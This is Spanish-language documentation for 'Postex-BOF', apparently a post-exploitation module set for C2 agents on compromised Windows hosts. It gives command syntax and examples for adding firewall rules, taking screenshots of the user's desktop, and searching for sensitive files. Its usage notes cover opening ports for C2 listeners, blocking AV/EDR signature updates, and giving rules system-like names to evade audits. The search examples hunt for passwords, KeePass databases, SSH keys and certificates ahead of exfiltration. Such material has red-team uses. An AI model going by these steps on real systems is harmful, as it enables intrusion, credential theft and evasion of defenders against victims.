Postex-BOF
Postex-BOF proporciona utilidades para operaciones de post-explotación: manipulación del firewall, captura de pantalla y búsqueda avanzada de archivos sensibles en el sistema comprometido.
Agentes compatibles: Beacon, Gopher, Kharon | Plataforma: Windows
firewallrule add
Agrega una regla al Firewall de Windows. Permite abrir puertos, autorizar tráfico o bloquear conexiones específicas.
firewallrule add --name <nombre> --port <puerto> [--protocol <proto>] [--direction <dir>] [--action <accion>]| Argumento | Requerido | Descripción |
|---|---|---|
--name | Si | Nombre descriptivo de la regla |
--port | Si | Puerto o rango de puertos |
--protocol | No | Protocolo: tcp (por defecto) o udp |
--direction | No | Dirección: in (por defecto) o out |
--action | No | Acción: allow (por defecto) o block |
Ejemplos:
# Abrir el puerto 9000 TCP para un listener bind TCP
firewallrule add --name "Windows Update Service" --port 9000 --protocol tcp --direction in --action allow
# Abrir un puerto UDP para DNS personalizado
firewallrule add --name "DNS Helper" --port 5353 --protocol udp --direction in --action allow
# Bloquear tráfico saliente a un rango de puertos
firewallrule add --name "Security Update" --port 8080 --direction out --action blockSituaciones de uso:
- Antes de desplegar un agente BeaconTCP (bind), abrir el puerto en el firewall para que el servidor pueda conectarse.
- Crear reglas de firewall que permitan el tráfico de comunicación del C2.
- Bloquear tráfico saliente hacia servidores de actualización de AV/EDR para evitar que descarguen nuevas firmas.
Nota sobre OPSEC: Usa nombres de regla que parezcan legítimos del sistema para evitar detección durante auditorías de firewall. Recuerda eliminar las reglas después de la operación.
screenshot_bof
Captura una captura de pantalla del escritorio actual del usuario.
screenshot_bofNo requiere argumentos. Captura toda la pantalla y devuelve la imagen al operador.
Ejemplos:
# Tomar una captura de pantalla
screenshot_bofSituaciones de uso:
- Reconocimiento visual de la actividad del usuario en tiempo real.
- Documentar evidencia durante un engagement de red team.
- Verificar qué aplicaciones está usando el usuario (gestores de contraseñas, VPNs, etc.).
- Confirmar que un usuario privilegiado está activo antes de intentar robo de credenciales.
sauroneye
Herramienta avanzada de búsqueda de archivos. Permite buscar archivos por extensión, nombre, contenido, tamaño y fecha de modificación. Extremadamente útil para localizar documentos sensibles, bases de datos de contraseñas, claves SSH y archivos de configuración.
sauroneye <ruta> [opciones]| Argumento | Requerido | Descripción |
|---|---|---|
path | Si | Directorio base de búsqueda |
--ext | No | Extensiones de archivo separadas por comas (ej: docx,xlsx,pdf) |
--keywords | No | Palabras clave para buscar en nombres de archivo, separadas por comas |
--content | No | Palabras clave para buscar dentro del contenido de los archivos |
--maxsize | No | Tamaño máximo de archivo en bytes |
--minsize | No | Tamaño mínimo de archivo en bytes |
--modified-after | No | Archivos modificados después de una fecha |
--modified-before | No | Archivos modificados antes de una fecha |
--subdirs | No | Buscar recursivamente en subdirectorios |
Ejemplos:
# Buscar documentos Office y PDF en el escritorio del usuario
sauroneye C:\Users\admin\Desktop --ext docx,xlsx,pptx,pdf --subdirs
# Buscar archivos con "password" o "credential" en el nombre
sauroneye C:\Users --keywords password,credential,contraseña,clave --subdirs
# Buscar archivos de configuración con contraseñas en su contenido
sauroneye C:\inetpub --ext config,xml,json,ini --content password,connectionstring,apikey --subdirs
# Buscar bases de datos de KeePass
sauroneye C:\Users --ext kdbx,kdb --subdirs
# Buscar claves SSH y certificados
sauroneye C:\Users --ext pem,ppk,key,pfx,p12 --subdirs
# Buscar archivos recientes y grandes (posibles dumps o exports)
sauroneye C:\Users --minsize 1048576 --modified-after 2026-09-01 --subdirs
# Buscar scripts con credenciales hardcodeadas
sauroneye C:\Scripts --ext ps1,bat,cmd,vbs --content password,passwd,secret --subdirsSituaciones de uso:
- Recolección de credenciales: Buscar archivos con contraseñas almacenadas (configs, scripts, notas).
- Exfiltración de datos: Localizar documentos sensibles antes de la extracción.
- Búsqueda de claves: Encontrar claves SSH, certificados PFX, archivos KeePass.
- Reconocimiento: Entender qué tipo de trabajo realiza el usuario comprometido.
- Auditoría de seguridad: Verificar si hay información sensible expuesta en ubicaciones accesibles.
Advertencia: La opción
--content(búsqueda dentro de archivos) es muy lenta en directorios grandes ya que lee el contenido de cada archivo que coincide con los filtros. Usa filtros de extensión y tamaño para limitar el alcance.
Flujo de trabajo recomendado
- Usa
screenshot_bofpara obtener una visión general de la actividad del usuario. - Usa
sauroneyecon--exty--keywordspara localizar archivos sensibles rápidamente. - Si necesitas abrir puertos para desplegar listeners adicionales, usa
firewallrule add. - Para búsquedas más profundas, agrega
--contentcon filtros restrictivos de extensión y tamaño.